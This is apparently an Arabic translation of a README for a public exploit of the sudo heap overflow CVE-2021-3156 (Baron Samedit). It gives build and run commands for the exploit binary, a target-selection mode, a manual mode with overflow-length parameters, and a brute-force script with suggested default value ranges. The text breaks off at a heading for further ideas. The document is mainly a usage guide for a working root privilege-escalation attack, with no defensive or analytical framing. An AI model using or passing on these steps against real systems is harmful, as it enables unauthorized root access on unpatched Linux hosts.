
استغلال تجاوز سعة المخزن المؤقت في الكومة لـ CVE-2021-3156 (Baron Samedit) في sudo، مما يوفر تصعيد الامتيازات إلى الجذر مع تكوينات هدف متعددة وإيجاد الهدف التجريبي بالهجوم بالقوة العمياء.
هذا استغلال لثغرة sudo CVE-2021-3156 (المعروفة باسم Baron Samedit من قبل Qualys).
البناء:
$ make
قائمة الأهداف:
$ ./sudo-hax-me-a-sandwich
التشغيل:
$ ./sudo-hax-me-a-sandwich <target_number>
الوضع اليدوي:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
تأكد من تثبيت GNU parallel.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
بعض القيم الافتراضية للتجربة:
$ ./brute.sh 90 120 50 70 150 300
سيستهلك جميع الأنوية المتاحة. لا تحاول مشاهدة نتفلكس والبحث الشامل في نفس الوقت.
أرسل طلبات السحب (المعقولة)، قد أدمجها.
بعض الأفكار: